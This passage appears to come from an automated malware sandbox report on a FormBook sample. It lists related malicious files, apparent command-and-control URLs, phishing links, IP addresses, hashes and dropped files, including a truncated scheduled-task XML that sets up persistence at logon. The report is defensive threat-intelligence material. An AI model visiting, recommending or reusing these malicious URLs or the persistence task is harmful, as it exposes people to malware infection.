                                          o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/
                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/?FBEd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hbvgW/E7EGitLXVKOGZWUueXafmCZ6g==&4h8=YPQX8Tch
                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                          • www.techchains.info/fo8o/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          94950.bodis.comCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          Shipping Document.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          CIPL_TD2024_INV086.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 199.59.243.225
                                          URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          webredir.vip.gandi.netNondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          KT-L068310.exeGet hashmaliciousFormBookBrowse
                                          • 217.70.184.50
                                          Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.70.184.50
                                          DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                                          • 217.70.184.50
                                          DHL Overdue Account Notice - 1606622076.PDF.exeGet hashmaliciousFormBookBrowse
                                          • 217.70.184.50
                                          m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 217.70.184.50
                                          www.cica-rank.combin.exeGet hashmaliciousFormBookBrowse
                                          • 183.181.79.111
                                          www.botcsllc.comCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                          • 216.40.34.41
                                          PI No 20000814C.exeGet hashmaliciousFormBookBrowse
                                          • 216.40.34.41
                                          SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                          • 216.40.34.41
                                          Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                          • 216.40.34.41
                                          lb.webnode.ioNondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.73.27.108
                                          Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.73.27.108
                                          Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.125.172.46
                                          Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.73.27.108
                                          RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 3.125.172.46
                                          2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 3.73.27.108
                                          MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 3.73.27.108
                                          Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.125.172.46
                                          RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 3.73.27.108
                                          Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 3.125.172.46
                                          www.equi-sen.caCOMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 199.59.243.225

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SAKURA-CSAKURAInternetIncJPbWT2t63tyx.elfGet hashmaliciousMiraiBrowse
                                          • 160.27.251.145
                                          SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                          • 49.212.69.13
                                          SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                          • 49.212.69.13
                                          bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                                          • 112.78.226.199
                                          https://url12.mailanyone.net/scanner?m=1s97Ju-0007cP-5W&d=4%7Cmail%2F90%2F1716228000%2F1s97Ju-0007cP-5W%7Cin12g%7C57e1b682%7C11949542%7C14589158%7C664B8FE646C773D5644A5A16205D613D&o=%2Fphti%3A%2Fitsc3e4rnc.1bu&s=WFgXHfph-aCfQ3HNg6dfjLZSkk4Get hashmaliciousUnknownBrowse
                                          • 120.136.14.71
                                          https://url12.mailanyone.net/scanner?m=1s97Wg-0007OG-5w&d=4%7Cmail%2F90%2F1716228600%2F1s97Wg-0007OG-5w%7Cin12e%7C57e1b682%7C11949542%7C14589158%7C664B92FE7E7733B9B01FA361DA6487AF&o=%2Fphta%3A%2Fstspgiexou.nrP.srxp%2FMvjV7dvygwS7x%2FizWOqqG&s=2zn5SGraXgtNWi1MOGGJ5ZmUbDQGet hashmaliciousUnknownBrowse
                                          • 120.136.14.8
                                          file.exeGet hashmaliciousSystemBCBrowse
                                          • 182.48.49.234
                                          bin.exeGet hashmaliciousFormBookBrowse
                                          • 183.181.79.111
                                          bcwvzwbh.exeGet hashmaliciousUnknownBrowse
                                          • 202.254.235.59
                                          https://bidytwtacjch.sakura.ne.jp/07J08cH5/?id=virus0763Get hashmaliciousEICARBrowse
                                          • 49.212.180.46
                                          PAIR-NETWORKSUSfile.exeGet hashmaliciousFormBookBrowse
                                          • 65.181.132.158
                                          Aqua.x86.elfGet hashmaliciousMiraiBrowse
                                          • 216.92.247.234
                                          6tvhMUgxvt.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                          • 216.146.221.89
                                          6tvhMUgxvt.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                          • 216.146.221.89
                                          3rU5FsjiS4.elfGet hashmaliciousUnknownBrowse
                                          • 216.92.247.236
                                          EdO1baKdpe.elfGet hashmaliciousMiraiBrowse
                                          • 66.39.36.255
                                          uPGFD6puIk.elfGet hashmaliciousMiraiBrowse
                                          • 66.39.121.232
                                          ciSIGJc6Op.elfGet hashmaliciousMiraiBrowse
                                          • 66.39.84.129
                                          http://www.holoholo.org/cgi_bin/redirect.pl?url=http://www.mobiliergalati.ro/valFe5nk17Fe5dy9guFe5rri2PFe5rWO3x0qdai2Pi2Ps3Rhi2P-sankyWO3dy9i2Pk17Get hashmaliciousHTMLPhisherBrowse
                                          • 216.92.101.66
                                          hoTzALhSyO.elfGet hashmaliciousMiraiBrowse
                                          • 209.197.114.131
                                          BODIS-NJUSCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          Shipping Document.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 199.59.243.225
                                          COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 199.59.243.225
                                          USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                          • 199.59.243.225
                                          w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                          • 199.59.243.225
                                          SecuriteInfo.com.FileRepMalware.10630.9616.exeGet hashmaliciousUnknownBrowse
                                          • 199.59.243.225
                                          file.exeGet hashmaliciousCMSBruteBrowse
                                          • 199.59.243.225
                                          OVHFRReiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          • 144.217.159.195
                                          https://uncovered-fragrant-climb.glitch.me/public/eleventy.js.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 54.36.150.183
                                          cVxP229sNF.elfGet hashmaliciousUnknownBrowse
                                          • 54.38.100.56
                                          ZVQBodhgp1.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 178.32.95.200
                                          boost.exeGet hashmaliciousNovaSentinelBrowse
                                          • 151.80.29.83
                                          SecuriteInfo.com.Win64.Malware-gen.22846.13203.exeGet hashmaliciousUnknownBrowse
                                          • 51.79.185.26
                                          SecuriteInfo.com.Win64.Malware-gen.22846.13203.exeGet hashmaliciousUnknownBrowse
                                          • 51.79.185.26
                                          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                          • 51.178.83.31
                                          http://delicious-decorous-army.glitch.me/public/RRENFCONL0.HTMLGet hashmaliciousHTMLPhisherBrowse
                                          • 54.36.150.187
                                          https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                                          • 51.38.157.251

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4TH HIRE SOA REMITTANCE_USD280,000.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRogNEHvcL.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379552885213346
                                          Encrypted:false
                                          SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIfA2KRHmOugw1s
                                          MD5:3E5712DC6AFCA8CF60C5CB8BE65E2089
                                          SHA1:CDBAF3935912EFB05DBE58CA89C5422F07B528A0
                                          SHA-256:B9F7E5F0AFD718D8585A8B37DD8C459ECDD4E7E68C5FE61631D89CDD3E229833
                                          SHA-512:1BD81033EB26CD0EE3DEF6F02FECB4097D878D61CAA5BEF6739C51E889B99C9E695BECF51719959D33F7BA9838E202ADD7EE4DD704D5163B584F4E8B8B7ECC38
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\Y656-D6L1

                                          Download File
                                          Process:C:\Windows\SysWOW64\winver.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.121297215059106
                                          Encrypted:false
                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azxhduxd.o4l.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gracnpwr.0gd.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_im3uef2p.bfq.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mld0gfds.vau.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upwf1lj4.gxn.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxzp5qwv.syp.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xff2mrt0.bys.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y551avhh.khe.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\tmp16FF.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1583
                                          Entropy (8bit):5.104014790909776
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiiv
                                          MD5:571F67E1C245EDF95D7DC148D7384F65
                                          SHA1:161B18FFD99EB0A13D221CB21C005549A1F84B7F
                                          SHA-256:8CE3C94CFCE56784151159C105B035692E40E4415A362AA99A722628D77EC2B3
                                          SHA-512:B8ABE02701A09381E23D1F217AE259A02BE624FCF10FC2009C15A29750C133E4DD942C79DE246C9CCBFD960C3AF6D9E9C754F33FBF1F3570F387ADC5DBDA78DE
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Local\Temp\tmp30FF.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1583
                                          Entropy (8bit):5.104014790909776
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiiv
                                          MD5:571F67E1C245EDF95D7DC148D7384F65
                                          SHA1:161B18FFD99EB0A13D221CB21C005549A1F84B7F
                                          SHA-256:8CE3C94CFCE56784151159C105B035692E40E4415A362AA99A722628D77EC2B3
                                          SHA-512:B8ABE02701A09381E23D1F217AE259A02BE624FCF10FC2009C15A29750C133E4DD942C79DE246C9CCBFD960C3AF6D9E9C754F33FBF1F3570F387ADC5DBDA78DE
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Roaming\GRogNEHvcL.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):694272
                                          Entropy (8bit):7.964972138655388
                                          Encrypted:false
                                          SSDEEP:12288:QuzrYCFd6x0NOG61NSeL/wbnTzOELvg4vMtlLEMlaUrC3WPhp3LVZ0VXZGnNGa:N81x0NOG6TSsYbTfPmEMdeEhJpiVpGn/
                                          MD5:7BFC6728400D041F90F6DD5B3F67AA38
                                          SHA1:E3DFA3816A4B4FA3C4E7146953F1CC7DEBB84BE8
                                          SHA-256:92EF596E60597EC73400540CE819005B4D0CA33716AE9F0129547B119415E1D9
                                          SHA-512:FA5D5B7882B72F2BB76CC7160689000D43C1011E14FBC4DCC469E42D95DE29965B0B51F5C8149813C2BA10449063D1F161E62AD2CA33137DFD94FCC574BDDEF6
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 42%
